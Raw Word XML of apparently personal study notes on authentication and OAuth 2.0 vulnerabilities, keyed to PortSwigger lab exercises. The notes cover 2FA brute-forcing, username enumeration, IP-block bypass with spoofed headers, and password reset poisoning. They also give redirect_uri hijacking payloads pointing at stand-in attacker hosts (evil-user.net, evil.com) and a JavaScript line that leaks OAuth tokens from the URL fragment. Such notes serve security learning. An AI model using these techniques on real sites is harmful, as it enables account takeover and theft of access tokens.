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150" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication vulnerabilities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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>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ourier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication is the process of verifying that a user is who they claim to be. Authorization involves verifying whether a user is allowed to do something.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Tools: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r:id="rId7">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https://www.browserling.com/tools/all-hashes</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Reverse lookup of md5sum hash</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ab/>
      </w:r>
      <w:hyperlink r:id="rId8">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https://md5.gromweb.com/?md5=26323c16d5f4dabff3bb136f2460a943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Three authentication factors</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5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Something you know, such as a password or the answer to a security question. These are sometimes referred to as "knowledge factors".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5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Something you have, that is, a physical object like a mobile phone or security token. These are sometimes referred to as "possession factors".</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5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Something you are or do, for example, your biometrics or patterns of behavior. These are sometimes referred to as "inherence factors".</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D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="280" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities in authentication mechanisms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FA</w:t>
        <w:tab/>
        <w:t xml:space="preserve">can be brute forced if the logic is flaws</w:t>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if IP block happens</w:t>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if IP block is unblocked after successful login so use your own </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">account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do login and hence unblock happens then continue the attack for the victim user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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the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FA is not fully secure because the first FA is authenticated and then this fact is saved in cookie </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so the attacker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swap this  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with the victim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user and then brute force it for the 2FA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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50" w:before="0" w:line="24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authentication if IP block logic is not there for 2FA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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50" w:before="0" w:line="24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 is stored in cookie so can be swapped or something</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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users have too many attempts error when user exist in system</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 all password can be passed in the json if the password and username is passed as json and password field is a list which is a valid json</w:t>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 stay log in triggers a store of cookie flag which are encoded with static values and can be used to bypass login step altogether</w:t>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the reset token is not checked who has generated the token so your account token can be used to reset the password of victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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resetting the password, check if the reset password is sending username also to check whose password is being reset and also sometimes the API can accessed without login</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figure out different combination of error messages that you get and design the logic from it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Bypass different IP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yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Forwarded-For</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1.2.3.4    &lt;if contains many IPs then it shows the chain of proxy servers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r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="374151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP header used to identify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="374151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">originating IP address of a client</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="374151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connecting to a web server through an HTTP proxy or a load balancer. To check if this is being used or not, then send with and without this header and check the differences in response header</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Its very finky where don’t pass the https and also without space before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ab/>
        <w:t xml:space="preserve">X-Forwarded-Host: exploit-0a1500cc041579c2801593f001e6008d.exploit-server.net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374151"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"X-Forwarded-Host" (XFH) header is an HTTP header that is used to pass the o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="374151"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">riginal host requested by the client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="374151"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to a web server, especially when requests pass through proxy servers or load balancers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start from here: </w:t>
      </w:r>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https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware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ab/>
        <w:t xml:space="preserve">X-Forwarded-Host</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https://portswigger.net/web-security/authentication/password-based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Easy Level:</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BruteForcing the password and find username via email</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Username enumeration: Username enumeration is when an attacker is able to observe changes in the website's behaviour in order to identify whether a given username is valid.</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ab/>
        <w:tab/>
        <w:t xml:space="preserve">while checking, things to look for change in: </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5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codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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5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1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error messages:  could be different by a “space or stop so attack and do grep on error msg:</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5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1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response times: by giving very long password</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50" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="25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1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Columns of response time is on title bar of intruder attack</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15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1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When username is correct and password is wrong and long, it might have different response time and if username is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:color w:val="1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wrong</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> then it has same </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:color w:val="1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</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15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1a2461"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If username and password are correct then status would be different</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5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form gets set in the json format then password can be passed as list of password in single form itself.</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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the Authorization header is added in every request then, HTTP basic authentication is used and hence Authorization: Basic bas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e64(username:password)</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the rest of lab after 3 labs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https://portswigger.net/web-security/authentication/password-based</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="1"/>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:spacing w:after="15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000000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OAuth 2.0 </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
            <w:b w:val="1"/>
            <w:i w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="48"/>
            <w:szCs w:val="48"/>
            <w:u w:val="none"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">authentication vulnerabilities</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OAuth is authorization framework to share limited access to account instead of sharing all details and username and password to 3rd party software. Identify the params and url endpoint if Oauth is being used.</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It works by defining a series of interactions between three distinct parties, namely a </w:t>
      </w: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client application</w:t>
      </w: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a resource owner</w:t>
      </w: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 and the </w:t>
      </w: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OAuth service provider</w:t>
      </w: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w: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-56459</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>251370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5536914" cy="3974550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="152400" distT="152400" distL="152400" distR="152400"/>
            <wp:docPr descr="Screenshot 2025-01-02 at 13.07.19.png" id="1073741826" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Screenshot 2025-01-02 at 13.07.19.png" id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5536914" cy="3974550"/>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Grant types </w:t>
      </w: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also known as </w:t>
      </w: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OAuth flows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w:t>
      </w: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egardless of which OAuth grant type is being used, the first request of the flow will always be a request to the /authorization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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endpoint containing a number of query parameters that are used specifically for OAuth. In particular, keep an eye out for the </w:t>
      </w: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client_id</w:t>
      </w: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redirect_uri</w:t>
      </w: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 and </w:t>
      </w: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response_type</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parameters. For example, an authorization request will usually look something like this:</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which Oauth flow is being used:</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 Implicit grant type : if authorization is asking for token instead of code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ab/>
        <w:t xml:space="preserve">It contains header like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer &lt;token&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="15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2. Authorization code flow (contains code and access code flow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="150" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you know the hostname of the authorization server, you should always try sending a GET request to the following standard endpoints:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="707" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.well-known/oauth-authorization-server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="707" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.well-known/openid-configuration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:spacing w:after="150" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These will often return a JSON configuration file containing key information which increases the attack surface.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="15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spacing w:after="150" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These parameters to auth is very important</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token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be used for authenticating another user. So intercept and check</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param present in oauth requests</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> in /auth or /callback requests</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Fonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">state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parameter should ideally contain an unguessable value, such as the hash of something tied to the user's session when it first initiates the OAuth flow which acts as csrf token. So attacker can initiate and later use victim to complete the request</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redirect_uri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hijacking: check if any url can be added here to get the code sent to vulnearable site so as to steal and use it</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flawed redirect urls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 addition params or paths can be added</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ed7d31"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">explore more(ssrf and cors)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https://default-host.com &amp;@foo.evil-user.net#@bar.evil-user.net/</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duplicate redirect_uri to see if error is not triggered</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localhost in redirect_uri so register this domain and steal it </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>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localhost.evil-user.net</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response_mode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query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fragments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web_message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might change the redirect_uri parsing </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stealing code and access token using traversal of directory in redirect_uri and then accessing the code from query/fragment param for the redirect_uri. So e.g if directory traversal is possible then any page can get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 code grant type)/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access token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(implicit grant) and hence getting the code/token from the URL is by figuring out another vulnerability and the compromising the user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https://client-app.com/oauth/callback/../../example/path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https://client-app.com/example/path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5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some path links which renders the URL so that</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> this could be used to send into redirect_uri and get the code to evil.com</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ab/>
        <w:tab/>
        <w:t xml:space="preserve">use window.location = ‘/?’+ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">document.location.hash.substr(1) </w:t>
      </w:r>
